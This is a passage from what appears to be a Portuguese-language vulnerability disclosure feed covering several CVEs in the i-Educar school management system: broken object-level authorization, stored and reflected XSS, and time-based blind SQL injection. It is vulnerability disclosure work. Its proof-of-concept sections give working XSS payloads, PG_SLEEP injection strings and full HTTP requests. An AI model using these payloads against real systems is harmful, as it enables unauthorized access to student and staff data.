não autorizados devem receber a mensagem 403 "Proibido" ou uma resposta vazia.</li></ul></p> <p style="text-align: justify;"><b>Comportamento observado:</br></b><ul><li>Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autentique como um usuário sem privilégios (por exemplo, aluno, professor).</li></ul></p> <p><img src="/p/cve-2025-10073/image.png" width="1380" height="528" srcset="/p/cve-2025-10073/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-10073/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p><img src="/p/cve-2025-10073/image-1.png" width="846" height="616" srcset="/p/cve-2025-10073/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10073/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Envie a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/turma?&oper=get&resource=turma&id=14 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_turma_det.php?cod_turma=14 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low-privileged-session] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10073/image-2.png" width="1574" height="679" srcset="/p/cve-2025-10073/image-2_hu_7058d38f59e7fa4a.png 480w, /p/cve-2025-10073/image-2_hu_e22ce1bb894a2051.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="231" data-flex-basis="556px" /></p> <p style="text-align: justify;"><ul><li>Pudemos observar que informações sobre classes foram retornadas.</li></ul></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a: <ul> <li>Acesso não autorizado a PII sensíveis;</li> <li>Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);</li> <li>Possível abuso de dados do usuário ou personificação;</li> <li>Enumeração de usuários.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10074/ https://www.cvehunters.com/pt/p/cve-2025-10074/ <h2 id="cve-2025-10074-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-usuariostiposid">CVE-2025-10074: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/usuarios/tipos/(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10074" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10074</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/usuarios/tipos/(ID)</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Tipos de Usuário</code> e <code>Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-10074-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-usuariostiposid">CVE-2025-10074: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/usuarios/tipos/(ID)</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10074" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10074</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/usuarios/tipos/(ID)</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>Tipos de Usuário</code> e <code>Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet//usuarios/tipos/(ID)</code></p> <p>Parâmetros: <code>Tipos de Usuário</code> e <code>Descrição</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>Tipos de Usuário</code> e <code>Descrição</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC-Tipo'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10074/image.png" width="968" height="556" srcset="/p/cve-2025-10074/image_hu_ec3ebce9e8efdcbd.png 480w, /p/cve-2025-10074/image_hu_29ddd785c353a757.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="174" data-flex-basis="417px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10099/ https://www.cvehunters.com/pt/p/cve-2025-10099/ <h2 id="cve-2025-10099-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_usuario_cadphp">CVE-2025-10099: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_usuario_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10099" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10099</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_usuario_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>email</code>, <code>data_inicial</code> e <code>data_expiracao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_cad.php</code></p> <p>Parâmetros: <code>email</code>, <code>data_inicial</code> e <code>data_expiracao</code></p> <p style="text-align: justify;">O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.</p><h2 id="cve-2025-10099-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_usuario_cadphp">CVE-2025-10099: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_usuario_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10099" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10099</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_usuario_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>email</code>, <code>data_inicial</code> e <code>data_expiracao</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_usuario_cad.php</code></p> <p>Parâmetros: <code>email</code>, <code>data_inicial</code> e <code>data_expiracao</code></p> <p style="text-align: justify;">O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payloads">Payloads: </h3><h4 id="parâmetro-email">Parâmetro <code>email</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC-Email')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="parâmetros-data_inicial-e-data_expiracao">Parâmetros <code>data_inicial</code> e <code>data_expiracao</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">3E%3Cimg%20src%3Dx%20onerror%3Dalert('XSS-PoC3')%3E </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10099/image.png" width="1222" height="534" srcset="/p/cve-2025-10099/image_hu_bf03398d0321c99e.png 480w, /p/cve-2025-10099/image_hu_ca402a023729493e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="228" data-flex-basis="549px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10011/ https://www.cvehunters.com/pt/p/cve-2025-10011/ <h2 id="cve-2025-10011-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoedit">CVE-2025-10011: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/TabelaArredondamento/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10011" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10011</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/TabelaArredondamento/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-10011-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoedit">CVE-2025-10011: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/TabelaArredondamento/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10011" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10011</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/TabelaArredondamento/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/TabelaArredondamento/edit</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /module/TabelaArredondamento/edit?id=1'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 680 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/TabelaArredondamento/edit?id=1 </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-10011/image.png" width="1126" height="1006" srcset="/p/cve-2025-10011/image_hu_6843a63da889ac32.png 480w, /p/cve-2025-10011/image_hu_2a61729ca2b8044e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="268px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10012/ https://www.cvehunters.com/pt/p/cve-2025-10012/ <h2 id="cve-2025-10012-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-ref_cod_aluno-do-endpoint-educar_historico_escolar_lstphp">CVE-2025-10012: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>ref_cod_aluno</code> do Endpoint <code>educar_historico_escolar_lst.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10012" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10012</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>ref_cod_aluno</code> do endpoint <code>educar_historico_escolar_lst.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>ref_cod_aluno</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-10012-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-ref_cod_aluno-do-endpoint-educar_historico_escolar_lstphp">CVE-2025-10012: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>ref_cod_aluno</code> do Endpoint <code>educar_historico_escolar_lst.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10012" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10012</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>ref_cod_aluno</code> do endpoint <code>educar_historico_escolar_lst.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>ref_cod_aluno</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>educar_historico_escolar_lst.php</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">AND 6986=(SELECT 6986 FROM PG_SLEEP(5)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206+AND+6986=(SELECT+6986+FROM+PG_SLEEP(5)) HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-10012/image.png" width="1572" height="707" srcset="/p/cve-2025-10012/image_hu_988aafc9dd1fbe7.png 480w, /p/cve-2025-10012/image_hu_7d467cabf908a825.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <p><img src="/p/cve-2025-10012/image-1.png" width="1566" height="711" srcset="/p/cve-2025-10012/image-1_hu_a4b5d2b9604e251f.png 480w, /p/cve-2025-10012/image-1_hu_465e2cc1a3c3c305.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="528px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-10013/ https://www.cvehunters.com/pt/p/cve-2025-10013/ <h2 id="cve-2025-10013-controle-de-acesso-quebrado-no-endpoint-exportacao-para-o-seb">CVE-2025-10013: Controle de Acesso Quebrado no Endpoint <code>/exportacao-para-o-seb</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10013" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10013</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/exportacao-para-o-seb</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes 